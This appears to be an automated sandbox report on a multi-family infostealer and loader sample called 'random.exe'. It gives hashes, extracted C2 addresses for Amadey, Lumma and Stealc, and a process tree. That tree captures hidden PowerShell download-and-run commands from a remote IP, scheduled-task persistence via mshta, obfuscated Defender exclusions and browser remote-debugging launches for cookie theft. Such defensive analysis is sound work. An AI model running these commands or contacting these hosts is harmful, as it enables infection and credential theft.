Overview

overview

10

Static

static

3

random.exe

windows7-x64

10

random.exe

windows10-2004-x64

10

Resubmissions

07/03/2025, 19:35

250307-yaszdswky8 10

07/03/2025, 17:54

250307-wg8bjstzcz 10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/03/2025, 17:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    random.exe

  • Size

    1.8MB

  • MD5

    34a1010b4f6cf9c985d71453702602d7

  • SHA1

    266541f9f120e4d4b79ebb5687bbe8a045281b6b

  • SHA256

    ba83807eaf0091c523cc48c99735ae4d690996446a6018aef97f4c07f7529a09

  • SHA512

    fdf1e61e69cb8c63dde682814f2fa0cf400c6ade91e5032eeeba21bf5c1623444bb76e48da312d40a5ad0d38910efbdfd798e8da9090a061a78d77c0f1eca89d

  • SSDEEP

    49152:F8WzsvHzPOk2md5JvUHV7qA3aJuFi8/y:F8gcOZmFsJZ3kCin

Score
10/10
amadeygcleanerhealerlummapovertystealerstealcvidar092155traff1trumpcredential_accessdefense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://dawtastream.bet/api

https://foresctwhispers.top/api

https://tracnquilforest.life/api

https://xcollapimga.fun/api

https://strawpeasaen.fun/api

https://jquietswtreams.life/api

https://starrynsightsky.icu/api

https://earthsymphzony.today/api

https://zfurrycomp.top/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://modelshiverd.icu/api

https://larisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://sterpickced.digital/api

https://defaulemot.run/api

https://arisechairedd.shop/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

stealc

Botnet

traff1

Attributes
  • url_path

    /gtthfbsb2h.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Poverty Stealer Payload 5 IoCs
  • Detect Vidar Stealer 1 IoCs
    stealer
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

    stealerpovertystealer
  • Povertystealer family
    povertystealer
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file 29 IoCs
  • Uses browser remote debugging 2 TTPs 21 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 16 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 9 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 7 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 63 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 22 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 18 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    defense_evasionspywaretrojan
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4924
      • C:\Users\Admin\AppData\Local\Temp\10126980101\7b5aced374.exe
        "C:\Users\Admin\AppData\Local\Temp\10126980101\7b5aced374.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn ThZvQmatz36 /tr "mshta C:\Users\Admin\AppData\Local\Temp\FTdycmLXZ.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3616
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn ThZvQmatz36 /tr "mshta C:\Users\Admin\AppData\Local\Temp\FTdycmLXZ.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:3068
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\FTdycmLXZ.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3180
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4168
            • C:\Users\Admin\AppData\Local\TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE
              "C:\Users\Admin\AppData\Local\TempYSJNFD19HKLHBK5PBTCAD4Z2VMCPIAY8.EXE"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1608
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10126990121\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3808
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:1444
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2452
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2660
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2732
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3040
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4128
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "R1wF4mamR8J" /tr "mshta \"C:\Temp\Grin1EP4b.hta\"" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3020
        • C:\Windows\SysWOW64\mshta.exe
          mshta "C:\Temp\Grin1EP4b.hta"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          PID:1548
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4696
            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:712
      • C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe
        "C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4708
        • C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe
          "C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"
          4⤵
          • Executes dropped EXE
          PID:2644
        • C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe
          "C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:5088
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 796
          4⤵
          • Program crash
          PID:3476
      • C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe
        "C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe"
        3⤵
        • Downloads MZ/PE file
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:212
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4488
        • C:\Users\Admin\AppData\Roaming\a.exe
          "C:\Users\Admin\AppData\Roaming\a.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4816
      • C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe
        "C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:2632
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          4⤵
          • Uses browser remote debugging
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:2220
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe47f5cc40,0x7ffe47f5cc4c,0x7ffe47f5cc58
            5⤵
              PID:3472
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=288,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1728 /prefetch:2
              5⤵
                PID:5028
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1904,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2152 /prefetch:3
                5⤵
                  PID:2372
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2256 /prefetch:8
                  5⤵
                    PID:4332
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:4168
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:3632
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:3068
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4556,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4552 /prefetch:8
                    5⤵
                      PID:2260
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3616,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3856 /prefetch:8
                      5⤵
                        PID:3712
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4900,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4804 /prefetch:8
                        5⤵
                          PID:5528
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4848,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4820 /prefetch:8
                          5⤵
                            PID:5748
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5032,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5044 /prefetch:8
                            5⤵
                              PID:5844
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4604,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:8
                              5⤵
                                PID:5892
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5096 /prefetch:8
                                5⤵
                                  PID:5932
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4844 /prefetch:8
                                  5⤵
                                    PID:5460
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5056,i,8007945358907539670,6817272517556145074,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:2
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:6100
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                  4⤵
                                  • Uses browser remote debugging
                                  • Enumerates system info in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of FindShellTrayWindow
                                  PID:5976
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffe47f646f8,0x7ffe47f64708,0x7ffe47f64718
                                    5⤵
                                    • Checks processor information in registry
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5940
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
                                    5⤵
                                      PID:5364
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
                                      5⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:5372
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
                                      5⤵
                                        PID:2916
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
                                        5⤵
                                        • Uses browser remote debugging
                                        PID:5244
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
                                        5⤵
